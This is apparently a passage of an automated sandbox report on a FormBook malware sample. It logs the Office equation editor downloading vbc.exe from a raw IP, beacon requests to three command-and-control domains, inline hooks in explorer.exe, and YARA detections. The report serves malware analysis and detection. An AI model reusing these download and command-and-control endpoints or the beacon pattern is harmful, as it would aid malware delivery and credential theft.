                                                            Nov 25, 2021 17:23:58.765455008 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765474081 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765495062 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765510082 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765531063 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765542030 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765563011 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765578032 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765597105 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765610933 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765631914 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765644073 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765661001 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765681028 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765695095 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765714884 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765731096 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765752077 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765768051 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765789032 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765803099 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765822887 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765837908 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765860081 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765873909 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765894890 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765912056 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765929937 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765961885 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.765964985 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765985012 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.765997887 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766031027 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766043901 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766055107 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766088009 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766122103 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766154051 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766155958 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766189098 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766195059 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766227007 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766228914 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766246080 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766261101 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766283989 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766294003 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766308069 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766330004 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766343117 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766362906 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766387939 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766396999 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766424894 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766429901 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766443014 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766463995 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766478062 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766496897 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766527891 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766530037 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766555071 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766561031 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766587973 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766593933 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766608953 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766625881 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766643047 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766658068 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766670942 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766690969 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766715050 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766724110 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766745090 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766757965 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766777992 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766789913 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766808987 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766823053 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766836882 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766855955 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766863108 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766887903 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766917944 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766921997 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766936064 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766957045 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.766971111 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.766990900 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767010927 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767024994 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767044067 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767055988 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767076969 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767088890 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767108917 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767122984 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767143965 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767154932 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767177105 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767187119 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767208099 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767220020 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767237902 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767252922 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767267942 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767287016 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767299891 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767318964 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767334938 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767352104 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767359018 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767385006 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767390966 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767416000 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767440081 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767448902 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767471075 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767477989 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767482042 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767512083 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767513990 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767545938 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767548084 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767566919 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767580032 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767601967 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767611980 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767633915 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767644882 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767663956 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767676115 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767695904 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767709017 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767728090 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767741919 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.767764091 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.767786980 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874349117 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874411106 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874444008 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874474049 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874512911 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874556065 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874594927 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874635935 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874675035 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874707937 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874713898 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874747992 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874754906 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874756098 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874759912 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874764919 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874771118 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874774933 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874778986 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874783039 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874787092 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874795914 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874818087 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874835968 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874861002 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874875069 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874893904 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874927044 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874941111 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.874969006 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.874990940 CET4916580192.168.2.22198.46.199.153

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2021 17:25:22.871083021 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Nov 25, 2021 17:25:22.928951025 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Nov 25, 2021 17:25:43.451653957 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Nov 25, 2021 17:25:43.503045082 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Nov 25, 2021 17:26:03.897233963 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Nov 25, 2021 17:26:04.095473051 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22

                                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 25, 2021 17:25:22.871083021 CET | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.mountfrenchlodge.net | A (IP address) | IN (0x0001)
Nov 25, 2021 17:25:43.451653957 CET | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.cuteprofessionalscrubs.com | A (IP address) | IN (0x0001)
Nov 25, 2021 17:26:03.897233963 CET | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.troddu.com | A (IP address) | IN (0x0001)

                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 25, 2021 17:25:22.928951025 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.mountfrenchlodge.net | mountfrenchlodge.net | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:25:22.928951025 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | mountfrenchlodge.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:25:43.503045082 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.cuteprofessionalscrubs.com | cuteprofessionalscrubs.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:25:43.503045082 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | cuteprofessionalscrubs.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 25, 2021 17:26:04.095473051 CET | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.troddu.com | troddu.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 17:26:04.095473051 CET | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | troddu.com | | 162.240.31.112 | A (IP address) | IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • 198.46.199.153
                                                            • www.mountfrenchlodge.net
                                                            • www.cuteprofessionalscrubs.com

                                                            HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 198.46.199.153 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:23:57.811558008 CET | 0 | OUT | GET /70007/vbc.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 198.46.199.153
                                                            Connection: Keep-Alive
Nov 25, 2021 17:23:57.931919098 CET | 1 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 25 Nov 2021 16:23:57 GMT
                                                            Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25
                                                            Last-Modified: Thu, 25 Nov 2021 02:23:58 GMT
                                                            ETag: "b4a00-5d193aabff887"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 739840
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:25:22.961991072 CET | 785 | OUT | GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1
                                                            Host: www.mountfrenchlodge.net
                                                            Connection: close
Nov 25, 2021 17:25:23.079817057 CET | 785 | IN | HTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 16:25:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6192576d-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:25:43.527704000 CET | 786 | OUT | GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1
                                                            Host: www.cuteprofessionalscrubs.com
                                                            Connection: close
Nov 25, 2021 17:25:43.645796061 CET | 787 | IN | HTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 16:25:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6192576d-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE5
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE5
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE5


                                                            System Behavior

                                                            General

                                                            Start time:17:24:12
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13f420000
                                                            File size:1423704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:17:24:14
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:17:24:17
                                                            Start date:25/11/2021
                                                            Path:C:\Users\Public\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\Public\vbc.exe"
                                                            Imagebase:0x1090000
                                                            File size:739840 bytes
                                                            MD5 hash:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:17:24:20
                                                            Start date:25/11/2021
                                                            Path:C:\Users\Public\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\Public\vbc.exe
                                                            Imagebase:0x1090000
                                                            File size:739840 bytes
                                                            MD5 hash:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:17:24:23
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0xffa10000
                                                            File size:3229696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:17:24:53
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\raserver.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\raserver.exe
                                                            Imagebase:0x480000
                                                            File size:101888 bytes
                                                            MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
